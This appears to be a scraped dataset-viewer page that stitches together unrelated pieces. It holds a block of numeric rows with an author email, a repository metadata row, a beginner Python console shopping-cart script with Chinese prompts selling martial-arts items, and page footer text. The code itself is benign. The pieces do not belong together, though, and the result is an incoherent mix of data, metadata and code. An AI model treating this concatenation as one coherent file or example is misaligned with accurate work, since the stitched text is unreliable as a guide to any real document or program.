748 1 0.98377 0.0410642 0.519615
756 1 0.969646 0.407957 0.916159
1563 1 0.747272 0.466864 0.867997
627 1 0.578428 0.559867 0.929814
1377 1 0.513923 0.671348 0.573124
1116 1 0.660039 0.753321 0.955061
1017 1 0.862617 0.77814 0.993498
1885 1 0.785337 0.723419 0.971125
1642 1 0.721527 0.871403 0.881306
1123 1 0.919869 0.946273 0.910223
1341 1 0.729259 0.994477 0.940643
1251 1 0.761023 0.00844777 0.953083
1469 1 0.625171 0.0177851 0.905696
1374 1 0.65301 0.972755 0.894678
344 1 0.908611 0.993483 0.905715
1054 1 0.789189 0.0448468 0.936368
188 1 0.857765 0.368884 0.997119
905 1 0.633737 0.257773 0.944738
850 1 0.865386 0.343432 0.944883
1494 1 0.810607 0.0907112 0.53925
1481 1 0.577148 0.41765 0.936536
1640 1 0.693046 0.568307 0.984524
1837 1 0.810813 0.775654 0.935934
981 1 0.645362 0.840996 0.978764
613 1 0.780728 0.816927 0.938518
992 1 0.633318 0.862345 0.9777
2024 1 0.943644 0.921086 0.962065
1565 1 0.631843 0.926264 0.94703
988 1 0.954582 0.984721 0.998128
47 1 0.889369 0.12628 0.970192
1577 1 0.513813 0.73858 0.784687
1357 1 0.86055 0.266635 0.520665
1516 1 0.599158 0.43241 0.962874
1203 1 0.857405 0.071525 0.553813
2012 1 0.550498 0.582884 0.958181
2008 1 0.683871 0.6421 0.892411
1738 1 0.94163 0.600728 0.971731
2031 1 0.962973 0.793693 0.523848
963 1 0.961967 0.769983 0.840227
221 1 0.910273 0.704043 0.951389
1231 1 0.508117 0.223138 0.523556
645 1 0.513723 0.174837 0.680027
1762 1 0.514292 0.18984 0.728028
231 1 0.564178 0.225865 0.966276
30 1 0.904538 0.378598 0.984758
1655 1 0.657062 0.616086 0.985989
1632 1 0.663632 0.489485 0.905735
2048 1 0.957174 0.239645 0.66781
1488 1 0.571994 0.559881 0.507978
191 1 0.501579 0.12709 0.594191
1024 1 0.500986 0.0484354 0.852249
162 1 0.924271 0.440687 0.998262
873 1 0.99976 0.31244 0.745407
| [
"scheuclu@gmail.com"
] | scheuclu@gmail.com |
75ceb6fdf8315b35a20773ebbf24f3381cb9ae67 | 1e4aef2d451a97a8aafb4e1cddfa4ebb0cc309cc | /first_step/shopping_cart/shopping_cart.py | 7665887eb831ea8e6b30c1d9609e1458235dfea7 | [] | no_license | FleeaniCh/python | 4c40b5d9d711796cee49a7b95bb7f64fa9257662 | 129a759212a8221de1a3d9c1cb3b66c6fece5a63 | refs/heads/master | 2023-03-12T06:40:05.120123 | 2021-02-28T02:03:34 | 2021-02-28T02:03:34 | 342,999,176 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,263 | py | dict_commodity_info = {
101: {"name": "屠龙刀", "price": 10000},
102: {"name": "倚天剑", "price": 10000},
103: {"name": "九阴白骨爪", "price": 8000},
104: {"name": "九阳神功", "price": 9000},
105: {"name": "降龙十八掌", "price": 8000},
106: {"name": "乾坤大挪移", "price": 10000}
}
list_order = []
def select_menu():
"""
购物
"""
while True:
item = input("1键购买,2键结算。")
if item == "1":
buying()
elif item == "2":
settlement()
def settlement():
"""
结算
"""
total_price = calculate_total_price()
paying(total_price)
def paying(total_price):
"""
支付过程
:param total_price:需要支付的价格
"""
while True:
qian = float(input("总价%d元,请输入金额:" % total_price))
if qian >= total_price:
print("购买成功,找回:%d元。" % (qian - total_price))
list_order.clear()
break
else:
print("金额不足.")
def calculate_total_price():
total_price = 0
for order in list_order:
commodity = dict_commodity_info[order["cid"]]
print("商品:%s,单价:%d,数量:%d." % (commodity["name"], commodity["price"], order["count"]))
total_price += commodity["price"] * order["count"]
return total_price
def buying():
"""
购买
"""
print_commodity_info()
create_order()
print("添加到购物车。")
def create_order():
"""
创建订单
"""
cid = input_commodity_id()
count = int(input("请输入购买数量:"))
order = {"cid": cid, "count": count}
list_order.append(order)
def input_commodity_id():
"""
获取商品订单
"""
while True:
cid = int(input("请输入商品编号:"))
if cid in dict_commodity_info:
break
else:
print("该商品不存在")
return cid
def print_commodity_info():
"""
打印商品信息
"""
for key, value in dict_commodity_info.items():
print("编号:%d,名称:%s,单价:%d。" % (key, value["name"], value["price"]))
select_menu()
| [
"17354108830@163.com"
] | 17354108830@163.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.